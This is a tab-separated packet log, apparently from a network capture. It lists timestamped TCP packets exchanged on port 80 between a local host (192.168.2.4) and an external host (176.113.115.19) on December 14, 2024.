Dec 14, 2024 14:12:47.992443085 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:47.992465019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:47.992513895 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.060075045 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.060113907 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.060216904 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.060216904 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.064380884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.064486027 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.064517021 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.064625025 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.107873917 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.107911110 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.107933998 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.107990026 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.112078905 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.112178087 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.112181902 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.112678051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.120799065 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.120861053 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.120924950 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.120978117 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.129496098 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.129518032 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.129565954 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.129565954 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.137217045 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.137274981 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.137279034 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.137428045 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.144856930 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.144943953 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.145047903 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.145164967 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.152498960 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.152560949 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.152575970 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.152631998 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.160157919 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.160218000 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.160290956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.160379887 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.167757988 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.167861938 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.167901039 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.167944908 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.175391912 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.175496101 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.175568104 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.175568104 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.251912117 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.251982927 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.252028942 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.252028942 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.255459070 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.255539894 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.255569935 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.255656004 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.262495995 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.262650013 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.262681007 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.262799025 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.269560099 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.269659042 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.269678116 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.269797087 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.276624918 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.276741982 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.276786089 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.276786089 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.283122063 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.283206940 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.283349991 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.283523083 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.289201021 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.289321899 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.289340019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.289424896 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.294987917 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.295048952 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.295078039 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.295144081 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.300441980 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.300544024 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.300565004 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.300590992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.305749893 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.305830002 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.305845976 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.305911064 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.311129093 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.311199903 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.311253071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.311319113 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.316476107 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.316549063 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.316572905 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.316649914 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.321783066 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.321906090 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.321948051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.321948051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.327114105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.327177048 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.327250004 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.327332020 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.332451105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.332506895 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.332552910 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.332623005 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.337784052 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.337846994 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.337882996 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.337882996 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.343111992 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.343261957 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.343303919 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.343303919 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.348503113 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.348577023 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.348622084 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.348622084 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.353833914 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.353924990 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.353971004 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.353971004 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.443897009 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.444005966 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.444191933 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.444231987 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.445837975 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.445879936 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.445940971 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.446391106 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.449687004 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.449747086 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.449809074 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.449884892 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.453533888 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.453658104 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.453696966 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.453778028 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.457398891 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.457473040 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.457529068 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.457660913 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.461138964 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.461189985 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.461246967 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.461340904 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.464723110 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.464833021 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.464950085 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.468298912 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.468406916 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.468409061 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.468451977 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.471944094 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.472012997 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.472033024 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.472075939 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.475497007 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.475594044 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.475620031 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.475758076 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.479012966 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.479105949 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.479113102 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.479252100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.482518911 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.482573032 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.482601881 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.483335018 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.486032963 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.486148119 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.486160994 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.487262011 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.489569902 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.489645004 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.489655972 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.489855051 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.493144035 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.493232965 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.493237972 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.493366003 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.496563911 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.496689081 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.496699095 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.496783018 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.500055075 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.500112057 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.500152111 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.500152111 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.503555059 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.503668070 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.503709078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.503709078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.507010937 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.507088900 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.507128000 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.507128000 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.510520935 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.510628939 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.510672092 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.510672092 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.514015913 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.514117956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.514159918 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.514159918 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.517524958 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.517570019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.517612934 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.518085957 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.521034956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.521145105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.521193981 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.521194935 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.524554014 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.524611950 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.524648905 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.524715900 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.528069973 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.528225899 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.528244019 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.528465033 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.531572104 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.531692982 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.531716108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.531876087 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.535080910 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.535202980 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.535245895 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.535245895 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.538582087 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.538670063 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.538707972 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.538707972 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.542052031 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.542115927 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.542156935 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.542232037 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.545553923 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.545641899 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.545664072 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.545715094 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.549061060 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.549140930 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.549165964 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.549534082 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.552580118 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.552665949 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.552684069 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.552793980 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.556112051 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.556221008 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.556236029 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.556385040 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.559604883 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.559673071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.559693098 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.559725046 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.563182116 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.563301086 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.563333035 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.563543081 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.642021894 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.642102957 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.642163038 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.642258883 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.643282890 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.643383980 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.643393993 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.643459082 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.645817995 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.645873070 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.645911932 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.645992994 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.648334026 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.648394108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.648433924 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.648533106 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.650893927 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.650949955 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.650989056 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.651026964 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.653402090 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.653634071 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.653677940 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.653738976 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.655843019 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.655899048 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.655934095 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.656058073 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.658256054 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.658353090 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.658354998 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.658525944 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.660676956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.660748959 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.660765886 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.660916090 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.662987947 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.663049936 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.663121939 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.663165092 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.665371895 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.665472031 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.665474892 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.665554047 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.667690039 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.667778015 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.667817116 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.667818069 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.670001984 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.670068026 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.670084000 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.670146942 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.672276974 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.672382116 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.672411919 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.672435999 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.674588919 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.674638033 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.674668074 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.674743891 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.676934004 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.676947117 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.676975012 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.677006960 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.679209948 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.679246902 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.679290056 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.679290056 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.681504011 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.681546926 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.681618929 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.681703091 CET	49731	80	192.168.2.4	176.113.115.19
Dec 14, 2024 14:12:48.683882952 CET	80	49731	176.113.115.19	192.168.2.4
Dec 14, 2024 14:12:48.683973074 CET	80	49731	176.113.115.19	192.168.2.4
